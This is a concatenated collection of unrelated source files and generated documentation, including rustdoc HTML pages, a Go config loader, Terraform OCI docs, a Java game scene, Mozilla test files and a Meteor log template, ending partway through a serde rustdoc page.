});
}),
<API key>.map(permission => {
const options = {};
if (<API key>(permission.name)) {
options.products = permission.options.products;
}
if (<API key>(permission.name)) {
options.actions = permission.options.actions;
}
return <API key>({
username,
permission: permission.name,
options,
changeType: 'insert',
when: new Date().getTime() + 5000,
});
}),
removedPermissions.map(permission => {
if (permission.sc) {
return <API key>({
scId: permission.sc.sc_id,
scDataVersion: permission.sc.sc_data_version,
});
}
return <API key>({
username,
permission: permission.name,
dataVersion: permission.data_version,
changeType: 'delete',
when: new Date().getTime() + 5000,
});
})
)
);
}; |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `XK_minus` constant in crate `x11`.">
<meta name="keywords" content="rust, rustlang, rust-lang, XK_minus">
<title>x11::keysym::XK_minus - Rust</title>
<link rel="stylesheet" type="text/css" href="../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<section class="sidebar">
<p class='location'><a href='../index.html'>x11</a>::<wbr><a href='index.html'>keysym</a></p><script>window.sidebarCurrent = {name: 'XK_minus', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content constant">
<h1 class='fqn'><span class='in-band'><a href='../index.html'>x11</a>::<wbr><a href='index.html'>keysym</a>::<wbr><a class='constant' href=''>XK_minus</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-1438' class='srclink' href='../../src/x11/keysym.rs.html#188' title='goto source code'>[src]</a></span></h1>
<pre class='rust const'>pub const XK_minus: <a class='type' href='../../libc/types/os/arch/c95/type.c_uint.html' title='libc::types::os::arch::c95::c_uint'>c_uint</a><code> = </code><code>0x02d</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../";
window.currentCrate = "x11";
window.playgroundUrl = "";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script async src="../../search-index.js"></script>
</body>
</html> |
// import { async, ComponentFixture, TestBed } from '@angular/core/testing';
// import { LineChartComponent } from './line-chart.component';
// describe('LineComponent', () => {
// let component: LineChartComponent;
// let fixture: ComponentFixture<LineChartComponent>;
// beforeEach(async(() => {
// TestBed.<API key>({
// declarations: [ LineChartComponent ]
// .compileComponents();
// beforeEach(() => {
// fixture = TestBed.createComponent(LineChartComponent);
// component = fixture.componentInstance;
// fixture.detectChanges();
// it('should be created', () => {
// expect(component).toBeTruthy(); |
package bot
import (
"encoding/json"
"io/ioutil"
"log"
)
// Config is the representation of the dynamic config.json
type Config struct {
Admin string `json:"admin"`
Notifiers map[string][]string `json:"notifiers"`
Debug bool `json:"debug"`
}
// NewConfig returns a new instance of Config
func NewConfig() *Config {
cfg := &Config{
Notifiers: make(map[string][]string),
}
return cfg
}
func (cfg *Config) fromJSON(filename string) error {
file, err := ioutil.ReadFile(filename)
if err != nil {
return err
}
if err = json.Unmarshal(file, &cfg); err != nil {
return err
}
log.Println("Loaded config.")
return nil
}
func (cfg *Config) toJSON(filename string) error {
jsonBytes, err := json.MarshalIndent(cfg, "", " ")
if err != nil {
return err
}
if err = ioutil.WriteFile(filename, jsonBytes, 0600); err != nil {
return err
}
log.Println("Saved config.")
return nil
} |
subcategory: "Database"
layout: "oci"
page_title: "Oracle Cloud Infrastructure: <API key>"
sidebar_current: "<API key>"
description: |-
Provides details about a specific Db Node in Oracle Cloud Infrastructure Database service
# Data Source: <API key>
This data source provides details about a specific Db Node resource in Oracle Cloud Infrastructure Database service.
Gets information about the specified database node.
## Example Usage
hcl
data "<API key>" "test_db_node" {
#Required
db_node_id = var.db_node_id
}
## Argument Reference
The following arguments are supported:
* `db_node_id` - (Required) The database node [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
## Attributes Reference
The following attributes are exported:
* `additional_details` - Additional information about the planned maintenance.
* `backup_ip_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup IP address associated with the database node.
**Note:** Applies only to Exadata Cloud Service.
* `backup_vnic2id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the second backup VNIC.
**Note:** Applies only to Exadata Cloud Service.
* `backup_vnic_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup VNIC.
* `db_system_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the DB system.
* `fault_domain` - The name of the Fault Domain the instance is contained in.
* `host_ip_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the host IP address associated with the database node.
**Note:** Applies only to Exadata Cloud Service.
* `hostname` - The host name for the database node.
* `id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the database node.
* `maintenance_type` - The type of database node maintenance.
* `<API key>` - The size (in GB) of the block storage volume allocation for the DB system. This attribute applies only for virtual machine DB systems.
* `state` - The current state of the database node.
* `time_created` - The date and time that the database node was created.
* `<API key>` - End date and time of maintenance window.
* `<API key>` - Start date and time of maintenance window.
* `vnic2id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the second VNIC.
**Note:** Applies only to Exadata Cloud Service.
* `vnic_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VNIC. |
initSidebarItems({"constant":[["BASE_UUID",""],["<API key>",""],["<API key>",""],["<API key>",""],["<API key>",""],["DESCRIPTOR_PREFIX",""],["SERVICE_PREFIX",""],["VALID_UUID_REGEX",""]],"struct":[["BluetoothUUID",""]],"type":[["<API key>",""],["<API key>",""],["<API key>",""],["UUID",""]]}); |
Qwartz
=============
Game made for a game jam at Mozilla Paris. |
package zyx.game.scene.game;
import java.util.ArrayList;
import org.lwjgl.input.Mouse;
import org.lwjgl.util.vector.Vector3f;
import zyx.engine.components.cubemaps.CubemapManager;
import zyx.engine.components.world.WorldObject;
import zyx.engine.curser.CursorManager;
import zyx.engine.curser.GameCursor;
import zyx.engine.scene.loading.WaitingProcess;
import zyx.engine.utils.ScreenSize;
import zyx.engine.utils.worldpicker.ClickedInfo;
import zyx.engine.utils.worldpicker.IWorldPickedItem;
import zyx.game.components.AnimatedMesh;
import zyx.game.components.screen.hud.BaseHud;
import zyx.game.components.screen.hud.DinerHud;
import zyx.game.components.world.interactable.IInteractable;
import zyx.game.components.world.interactable.InteractionAction;
import zyx.game.controls.input.MouseData;
import zyx.game.controls.process.impl.<API key>;
import zyx.game.models.GameModels;
import zyx.game.vo.Gender;
public class DinerScene extends GameScene
{
private static final boolean ONLINE = true;
public DinerHud dinerHud;
public DinerSceneData sceneData;
private IWorldPickedItem interactionCallback;
public DinerScene()
{
interactionCallback = this::<API key>;
}
@Override
protected void onPreloadResources()
{
preloadResource("mesh.player");
preloadResource("skybox.texture.desert");
preloadResource("cubemap.dragon");
}
@Override
protected void <API key>()
{
sceneData = new DinerSceneData(this);
if (ONLINE)
{
<API key>(new <API key>("Zyx", Gender.random()));
}
else
{
createPlayerObject();
}
<API key>(new WaitingProcess(3, "Reticulating Splines"));
<API key>(new WaitingProcess(5, "Branching Family Trees"));
<API key>(new WaitingProcess(7, "Blurring Reality Lines"));
world.loadSkybox("skybox.texture.desert");
CubemapManager.getInstance().load("cubemap.dragon");
world.setSunRotation(new Vector3f(-33, -5, -21));
dinerHud = (DinerHud) hud;
}
@Override
protected BaseHud createHud()
{
return new DinerHud();
}
@Override
public void createPlayerObject()
{
super.createPlayerObject();
sceneData.holderHandler.addItemHolder(player.getUniqueId(), player);
}
public void <API key>(IInteractable item)
{
addPickedObject(item, GameModels.selection);
addPickedObject(item, interactionCallback);
}
public void <API key>(IInteractable item)
{
removePickedObject(item, GameModels.selection);
removePickedObject(item, interactionCallback);
}
public void <API key>(ClickedInfo info)
{
CursorManager.getInstance().setCursor(GameCursor.HAND);
if (MouseData.data.isLeftClicked())
{
Mouse.setGrabbed(false);
Mouse.setCursorPosition(ScreenSize.windowWidth / 2, ScreenSize.windowHeight / 2);
WorldObject worldObject = info.worldObject;
if (worldObject instanceof IInteractable)
{
IInteractable target = ((IInteractable) worldObject);
ArrayList<InteractionAction> <API key> = target.getInteractions();
dinerHud.showInteractions(<API key>);
}
}
}
@Override
protected void onUpdate(long timestamp, int elapsedTime)
{
super.onUpdate(timestamp, elapsedTime);
if (sceneData != null)
{
sceneData.update(timestamp, elapsedTime);
}
}
@Override
protected void onDispose()
{
super.onDispose();
if (sceneData != null)
{
sceneData.dispose();
sceneData = null;
}
}
} |
package org.mozilla.javascript.tests.commonjs.module;
import java.io.File;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import org.mozilla.javascript.Context;
import org.mozilla.javascript.Function;
import org.mozilla.javascript.Scriptable;
import org.mozilla.javascript.ScriptableObject;
import org.mozilla.javascript.commonjs.module.Require;
import org.mozilla.javascript.commonjs.module.provider.<API key>;
import org.mozilla.javascript.commonjs.module.provider.<API key>;
import junit.framework.<API key>;
@RunWith(Parameterized.class)
public class ComplianceTest {
private File testDir;
public ComplianceTest(String name, File testDir) {
this.testDir = testDir;
}
@Parameterized.Parameters(name = "/{0}")
public static Collection<Object[]> data() {
List<Object[]> retval = new ArrayList<Object[]>(16);
final File[] files = new File("testsrc/org/mozilla/javascript/tests/commonjs/module/1.0").listFiles();
for (File file : files) {
if (file.isDirectory()) {
retval.add(new Object[]{file.getName(), file});
}
}
return retval;
}
private static Require createRequire(File dir, Context cx, Scriptable scope)
throws URISyntaxException {
return new Require(cx, scope, new <API key>(
new <API key>(
Collections.singleton(dir.getAbsoluteFile().toURI()),
Collections.singleton(new URI(ComplianceTest.class.getResource(".").toExternalForm() + "/")))),
null, null, false);
}
@org.junit.Test
public void testRequire() throws Throwable {
final Context cx = Context.enter();
try {
cx.<API key>(-1);
final Scriptable scope = cx.initStandardObjects();
ScriptableObject.putProperty(scope, "print", new Print(scope));
createRequire(testDir, cx, scope).requireMain(cx, "program");
} finally {
Context.exit();
}
}
private static class Print extends ScriptableObject implements Function {
Print(Scriptable scope) {
setPrototype(ScriptableObject.<API key>(scope));
}
public Object call(Context cx, Scriptable scope, Scriptable thisObj,
Object[] args) {
if (args.length > 1 && "fail".equals(args[1])) {
throw new <API key>(String.valueOf(args[0]));
}
return null;
}
public Scriptable construct(Context cx, Scriptable scope, Object[] args) {
throw new <API key>("Shouldn't be invoked as constructor");
}
@Override
public String getClassName() {
return "Function";
}
}
} |
XPCOMUtils.<API key>(this, "Promise",
"resource://gre/modules/Promise.jsm");
XPCOMUtils.<API key>(this, "Task",
"resource://gre/modules/Task.jsm");
const CHROME_BASE = "chrome://mochitests/content/browser/browser/base/content/test/general/";
const HTTPS_BASE = "https://example.com/browser/browser/base/content/test/general/";
const TELEMETRY_LOG_PREF = "toolkit.telemetry.log.level";
const <API key> = Preferences.get(TELEMETRY_LOG_PREF, null);
const originalReportUrl = Services.prefs.getCharPref("datareporting.healthreport.about.reportUrl");
<API key>(function() {
// Ensure we don't pollute prefs for next tests.
if (<API key>) {
Preferences.set(TELEMETRY_LOG_PREF, <API key>);
} else {
Preferences.reset(TELEMETRY_LOG_PREF);
}
try {
Services.prefs.setCharPref("datareporting.healthreport.about.reportUrl", originalReportUrl);
Services.prefs.setBoolPref("datareporting.healthreport.uploadEnabled", true);
} catch (ex) {}
});
function fakeTelemetryNow(...args) {
let date = new Date(...args);
let scope = {};
const modules = [
Cu.import("resource://gre/modules/TelemetrySession.jsm", scope),
Cu.import("resource://gre/modules/<API key>.jsm", scope),
Cu.import("resource://gre/modules/TelemetryController.jsm", scope),
];
for (let m of modules) {
m.Policy.now = () => new Date(date);
}
return date;
}
function* setupPingArchive() {
let scope = {};
Cu.import("resource://gre/modules/TelemetryController.jsm", scope);
Cc["@mozilla.org/moz/jssubscript-loader;1"].getService(Ci.<API key>)
.loadSubScript(CHROME_BASE + "<API key>.js", scope);
for (let p of scope.TEST_PINGS) {
fakeTelemetryNow(p.date);
p.id = yield scope.TelemetryController.submitExternalPing(p.type, p.payload);
}
}
var gTests = [
{
desc: "Test the remote commands",
setup: Task.async(function*() {
Preferences.set(TELEMETRY_LOG_PREF, "Trace");
yield setupPingArchive();
Preferences.set("datareporting.healthreport.about.reportUrl",
HTTPS_BASE + "<API key>.html");
}),
run(iframe) {
let deferred = Promise.defer();
let results = 0;
try {
iframe.contentWindow.addEventListener("<API key>", function evtHandler(event) {
let data = event.detail.data;
if (data.type == "testResult") {
ok(data.pass, data.info);
results++;
} else if (data.type == "testsComplete") {
is(results, data.count, "Checking number of results received matches the number of tests that should have run");
iframe.contentWindow.removeEventListener("<API key>", evtHandler, true);
deferred.resolve();
}
}, true);
} catch (e) {
ok(false, "Failed to get all commands");
deferred.reject();
}
return deferred.promise;
}
},
]; // gTests
function test() {
<API key>();
// xxxmpc leaving this here until we resolve bug 854038 and bug 854060
<API key>(10);
Task.spawn(function* () {
for (let testCase of gTests) {
info(testCase.desc);
yield testCase.setup();
let iframe = yield <API key>("about:healthreport");
yield testCase.run(iframe);
gBrowser.removeCurrentTab();
}
finish();
});
}
function <API key>(aUrl, aEventType = "load") {
let deferred = Promise.defer();
let tab = gBrowser.selectedTab = gBrowser.addTab(aUrl);
tab.linkedBrowser.addEventListener(aEventType, function load(event) {
tab.linkedBrowser.removeEventListener(aEventType, load, true);
let iframe = tab.linkedBrowser.contentDocument.getElementById("remote-report");
iframe.addEventListener("load", function frameLoad(e) {
if (iframe.contentWindow.location.href == "about:blank" ||
e.target != iframe) {
return;
}
iframe.removeEventListener("load", frameLoad);
deferred.resolve(iframe);
});
}, true);
return deferred.promise;
} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `VertexAttrib2dv` static in crate `gleam`.">
<meta name="keywords" content="rust, rustlang, rust-lang, VertexAttrib2dv">
<title>gleam::gl::storage::VertexAttrib2dv - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<section class="sidebar">
<p class='location'><a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>gl</a>::<wbr><a href='index.html'>storage</a></p><script>window.sidebarCurrent = {name: 'VertexAttrib2dv', ty: 'static', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content static">
<h1 class='fqn'><span class='in-band'><a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>gl</a>::<wbr><a href='index.html'>storage</a>::<wbr><a class='static' href=''>VertexAttrib2dv</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-29873' class='srclink' href='../../../src/gleam///home/servo/buildbot/slave/doc/build/target/debug/build/<API key>/out/gl_bindings.rs.html#7259-7262' title='goto source code'>[src]</a></span></h1>
<pre class='rust static'>pub static mut VertexAttrib2dv: <a class='struct' href='../../../gleam/gl/struct.FnPtr.html' title='gleam::gl::FnPtr'>FnPtr</a><code> = </code><code>FnPtr {
f: super::missing_fn_panic as *const libc::c_void,
is_loaded: false
}</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../";
window.currentCrate = "gleam";
window.playgroundUrl = "";
</script>
<script src="../../../jquery.js"></script>
<script src="../../../main.js"></script>
<script async src="../../../search-index.js"></script>
</body>
</html> |
<template name="appLogs">
{{#if isModerator}}
<h3>Application logs</h3>
<div id="logsFilterContainer" class="container">
<form id="logsFilter" name="logsFilter">
<div class="row form-items">
<div class="col-12 form-group">
<select class="form-control" id="js-level">
<option>ALL</option>
<option>INFO</option>
<option>WARN</option>
<option>ERROR</option>
</select>
<input id="js-search" name="searchInput" type="text" class="form-control" placeholder="Search logs by message...">
<input id="js-search-username" name="searchInput" type="text" class="form-control" placeholder="by username">
<input id="js-search-ip" name="searchInput" type="text" class="form-control" placeholder="by IP">
</div>
</div>
<div class="found-result">
{{#if filterCount}} Found {{filterCount}} results {{/if}}
</div>
</form>
</div>
<table class="table">
<thead>
<tr>
<th scope="col">Level</th>
<th scope="col">Date & Time</th>
<th scope="col">User</th>
<th scope="col">Message</th>
<th scope="col">Additional info</th>
</tr>
</thead>
<tbody>
{{#each applogs}}
<tr>
<td style="color: {{levelColor}}">{{level}}</td>
<td>{{date}}</td>
<td>{{user}}</td>
<td>{{message}}</td>
<td>{{additionalInfo}}</td>
</tr>
{{/each}}
</tbody>
</table>
<button id="js-more" class="btn btn-action" style="width: 100%">More data?</button>
{{else}}
<h1>This page is for moderators only.</h1>
{{/if}}
</template> |
# BotSire (DEPRECATED)
Telegram Bot API library for NodeJS
**DEPRECATED**
For now to run use: *node --<API key> \<file>*
To Install: *npm install --save botsire* |
X1=-2.0;Y1=-2.0;X2=2.0;Y2=2.0;for (y=0;y<32;y++) {print(y);} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `ArrayVisitor28` struct in crate `serde`.">
<meta name="keywords" content="rust, rustlang, rust-lang, ArrayVisitor28">
<title>serde::de::impls::ArrayVisitor28 - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<section class="sidebar">
<p class='location'><a href='../../index.html'>serde</a>::<wbr><a href='../index.html'>de</a>::<wbr><a href='index.html'>impls</a></p><script>window.sidebarCurrent = {name: 'ArrayVisitor28', ty: 'struct', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content struct">
<h1 class='fqn'><span class='in-band'>Struct <a href='../../index.html'>serde</a>::<wbr><a href='../index.html'>de</a>::<wbr><a href='index.html'>impls</a>::<wbr><a class='struct' href=''>ArrayVisitor28</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-18840' class='srclink' href='../../../src/serde/de/impls.rs.html#475-477' title='goto source code'>[src]</a></span></h1>
<pre class='rust struct'>struct ArrayVisitor28<T> {
marker: <a class='struct' href='../../../core/marker/struct.PhantomData.html' title='core::marker::PhantomData'>PhantomData</a><T>,
}</pre><h2 class='fields'>Fields</h2>
<table><tr class='stab '>
<td id='structfield.marker'><code>marker</code></td><td></td></tr></table><h2 id='methods'>Methods</h2><h3 class='impl'><code>impl<T> <a class='struct' href='../../../serde/de/impls/struct.ArrayVisitor28.html' title='serde::de::impls::ArrayVisitor28'>ArrayVisitor28</a><T></code></h3><div class='impl-items'><h4 id='method.new' class='method'><code>fn <a href='#method.new' class='fnname'>new</a>() -> Self</code></h4>
</div><h2 id='implementations'>Trait Implementations</h2><h3 class='impl'><code>impl<T> <a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Visitor</a> for <a class='struct' href='../../../serde/de/impls/struct.ArrayVisitor28.html' title='serde::de::impls::ArrayVisitor28'>ArrayVisitor28</a><T> <span class='where'>where T: <a class='trait' href='../../../serde/de/trait.Deserialize.html' title='serde::de::Deserialize'>Deserialize</a></span></code></h3><div class='impl-items'><h4 id='assoc_type.Value' class='type'><code>type Value = <a href='../../../std/primitive.array.html'>[T; 28]</a></code></h4>
<h4 id='method.visit_seq' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_seq' class='fnname'>visit_seq</a><V>(&mut self, visitor: V) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><<a href='../../../std/primitive.array.html'>[T; 28]</a>, V::Error> <span class='where'>where V: <a class='trait' href='../../../serde/de/trait.SeqVisitor.html' title='serde::de::SeqVisitor'>SeqVisitor</a></span></code></h4>
<h4 id='method.visit_bool' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_bool' class='fnname'>visit_bool</a><E>(&mut self, _v: <a href='../../../std/primitive.bool.html'>bool</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_isize' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_isize' class='fnname'>visit_isize</a><E>(&mut self, v: <a href='../../../std/primitive.isize.html'>isize</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_i8' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_i8' class='fnname'>visit_i8</a><E>(&mut self, v: <a href='../../../std/primitive.i8.html'>i8</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_i16' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_i16' class='fnname'>visit_i16</a><E>(&mut self, v: <a href='../../../std/primitive.i16.html'>i16</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_i32' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_i32' class='fnname'>visit_i32</a><E>(&mut self, v: <a href='../../../std/primitive.i32.html'>i32</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_i64' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_i64' class='fnname'>visit_i64</a><E>(&mut self, _v: <a href='../../../std/primitive.i64.html'>i64</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_usize' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_usize' class='fnname'>visit_usize</a><E>(&mut self, v: <a href='../../../std/primitive.usize.html'>usize</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_u8' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_u8' class='fnname'>visit_u8</a><E>(&mut self, v: <a href='../../../std/primitive.u8.html'>u8</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_u16' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_u16' class='fnname'>visit_u16</a><E>(&mut self, v: <a href='../../../std/primitive.u16.html'>u16</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_u32' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_u32' class='fnname'>visit_u32</a><E>(&mut self, v: <a href='../../../std/primitive.u32.html'>u32</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_u64' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_u64' class='fnname'>visit_u64</a><E>(&mut self, _v: <a href='../../../std/primitive.u64.html'>u64</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_f32' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_f32' class='fnname'>visit_f32</a><E>(&mut self, v: <a href='../../../std/primitive.f32.html'>f32</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_f64' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_f64' class='fnname'>visit_f64</a><E>(&mut self, _v: <a href='../../../std/primitive.f64.html'>f64</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
<h4 id='method.visit_char' class='method'><code>fn <a href='../../../serde/de/trait.Visitor.html#method.visit_char' class='fnname'>visit_char</a><E>(&mut self, v: <a href='../../../std/primitive.char.html'>char</a>) -> <a class='enum' href='../../../core/result/enum.Result.html' title='core::result::Result'>Result</a><Self::<a class='trait' href='../../../serde/de/trait.Visitor.html' title='serde::de::Visitor'>Value</a>, E> <span class='where'>where E: <a class='trait' href='../../../serde/de/trait.Error.html' title='serde::de::Error'>Error</a></span></code></h4>
